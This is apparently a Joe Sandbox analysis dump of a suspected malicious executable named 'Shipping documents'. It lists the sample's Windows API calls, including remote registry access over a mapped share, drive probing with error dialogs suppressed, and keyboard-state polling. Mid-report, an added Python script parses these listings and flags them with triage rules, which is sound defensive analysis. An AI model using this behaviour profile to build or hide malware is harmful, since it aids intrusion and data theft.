• Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
• Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
• Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
• Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
APIs
• _wcsncpy.LIBCMT ref: 00467490
• _wcsncpy.LIBCMT ref: 004674BC
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• _wcstok.LIBCMT ref: 004674FF
  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
• _wcstok.LIBCMT ref: 004675B2
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• _wcslen.LIBCMT ref: 00467793
• _wcscpy.LIBCMT ref: 00467641
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcslen.LIBCMT ref: 004677BD
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
• String ID: X
• API String ID: 3104067586-3081909835
• Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
• Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
• Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
• Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
APIs
• OleInitialize.OLE32(00000000), ref: 0046CBC7
• CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
• CLSIDFromString.OLE32(?,?), ref: 0046CBF1
• CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
• _wcslen.LIBCMT ref: 0046CDB0
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
• CoTaskMemFree.OLE32(?), ref: 0046CE42
• CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
Strings
• NULL Pointer assignment, xrefs: 0046CEA6
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
• String ID: NULL Pointer assignment
• API String ID: 440038798-2785691316
• Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
• Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
• Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
• Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00461056
• GetWindowTextW.USER32(?,?,00000400), ref: 00461092
• _wcslen.LIBCMT ref: 004610A3
• CharUpperBuffW.USER32(?,00000000), ref: 004610B1
• GetClassNameW.USER32(?,?,00000400), ref: 00461124
• GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
• GetClassNameW.USER32(?,?,00000400), ref: 004611A1
• GetClassNameW.USER32(?,?,00000400), ref: 004611D9
• GetWindowRect.USER32(?,?), ref: 00461248
  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
• String ID: ThumbnailClass
• API String ID: 4136854206-1241985126
• Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
• Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
• SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                          • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                          • String ID: 2
                                                                                                          • API String ID: 1331449709-450215437
                                                                                                          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                          • API String ID: 3054410614-2561132961
                                                                                                          • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                          • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                          • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                          • API String ID: 600699880-22481851
                                                                                                          • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                          • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                          • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                          • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DestroyWindow
                                                                                                          • String ID: static
                                                                                                          • API String ID: 3375834691-2160076837
                                                                                                          • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                          • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                          • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                          • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                          • API String ID: 2907320926-3566645568
                                                                                                          • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                          • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                          • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                          • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
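Two of the records above are worth more than a glance: the routine at 00458721 maps a network share with WNetAddConnection2W and then opens a remote machine's registry (RegConnectRegistryW with hive handle 80000002, which is HKEY_LOCAL_MACHINE) under KEY_READ (00020019), and the routine at 0045D959 probes drive types with SetErrorMode(1) set so that no "no disk" dialog interrupts it. The Python below is an added example, not Joe Sandbox code or code from the analysed sample: it parses bullet-style "APIs" listings of this shape into per-function records, decodes the registry hive and access-mask arguments, and applies a few triage rules that are my own. The sample text is copied from those two records; the rule names (remote-registry, registry-open, drive-enum) are hypothetical labels.

```python
# Added example (not Joe Sandbox code): parse per-function "APIs" listings and
# apply a few hypothetical triage rules to the parsed calls.
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the API bullet lines of two records from this report.
SAMPLE = """\
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
  • CLSIDFromString.OLE32(?,?), ref: 004587B3
  • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
  • RegCloseKey.ADVAPI32(?), ref: 004587C5
Strings
Memory Dump Source
APIs
  • SetErrorMode.KERNEL32(00000001), ref: 0045D959
  • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
Strings
"""

# One bullet: optional "Part of subcall function XXXXXXXX:" prefix, Api.MODULE,
# optional "(args)", then "ref: XXXXXXXX". A '?' argument was not resolved statically.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")

# Predefined hive handles accepted by RegConnectRegistryW / RegOpenKeyExW.
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# Composite registry access masks from winreg.h.
ACCESS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                    # call-site address
    subcall_of: Optional[int]   # address of the subroutine the line belongs to, if any


@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)

    def apis(self) -> set:
        return {c.api for c in self.calls}

    def direct(self) -> List[Call]:
        return [c for c in self.calls if c.subcall_of is None]


def parse_records(text: str) -> List[Record]:
    """One Record per 'APIs' header; a record ends at 'Strings' or 'Memory Dump Source'."""
    records, current = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            current = Record()
            records.append(current)
        elif s in ("Strings", "Memory Dump Source"):
            current = None
        elif current is not None and (m := API_RE.match(line)):
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            current.calls.append(Call(m.group("api"), m.group("mod"), args,
                                      int(m.group("ref"), 16),
                                      int(m.group("sub"), 16) if m.group("sub") else None))
    return records


def _hex(arg: str) -> Optional[int]:
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None


def decode_hive(arg: str) -> Optional[str]:
    v = _hex(arg)
    return HIVES.get(v) if v is not None else None


def describe_access(arg: str) -> Optional[str]:
    v = _hex(arg)
    return None if v is None else ACCESS.get(v, f"0x{v:X}")


def flag_record(rec: Record) -> List[str]:
    """Hypothetical triage rules (mine, not the sandbox's); returns readable findings."""
    findings, apis = [], rec.apis()
    if {"WNetAddConnection2W", "RegConnectRegistryW"} <= apis:
        hive = next((decode_hive(c.args[1]) for c in rec.calls
                     if c.api == "RegConnectRegistryW" and len(c.args) > 1), None)
        findings.append("remote-registry: maps a network share, then opens "
                        f"{hive or 'an unresolved hive'} on the remote host")
    for c in rec.calls:
        if c.api == "RegOpenKeyExW" and len(c.args) >= 4 and describe_access(c.args[3]):
            findings.append(f"registry-open: {describe_access(c.args[3])} at {c.ref:08X}")
    if {"SetErrorMode", "GetDriveTypeW"} <= apis:
        # SetErrorMode(1) = SEM_FAILCRITICALERRORS: no "no disk" dialog while probing drives
        findings.append("drive-enum: probes drive types with critical-error dialogs suppressed")
    return findings
```

Run `flag_record` over each element of `parse_records(SAMPLE)`; the first record yields the remote-registry finding with HKEY_LOCAL_MACHINE plus a KEY_READ open at 0045875C, the second only the drive-enum finding. Arguments the sandbox printed as `?` are left undecoded rather than guessed, which is why the hive lookup falls back to "an unresolved hive" instead of assuming a value.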
                                                                                                          APIs
                                                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                          • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                          • DeleteObject.GDI32(00610000), ref: 00470A04
                                                                                                          • DestroyIcon.USER32(004C005C), ref: 00470A1C
                                                                                                          • DeleteObject.GDI32(ACECE5E6), ref: 00470A34
                                                                                                          • DestroyWindow.USER32(0065006E), ref: 00470A4C
                                                                                                          • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                          • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                          • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1237572874-0
                                                                                                          • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                          • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                          • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                          • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                          APIs
                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                          • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                          • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                          • String ID:
                                                                                                          • API String ID: 2706829360-0
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                          • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                          • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                          • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                          • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3413494760-0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                          • String ID: AU3_FreeVar
                                                                                                          • API String ID: 2634073740-771828931
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32 ref: 0046C63A
                                                                                                          • CoUninitialize.OLE32 ref: 0046C645
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                          • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                          • API String ID: 2294789929-1287834457
                                                                                                          APIs
                                                                                                            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                          • ReleaseCapture.USER32 ref: 0047116F
                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
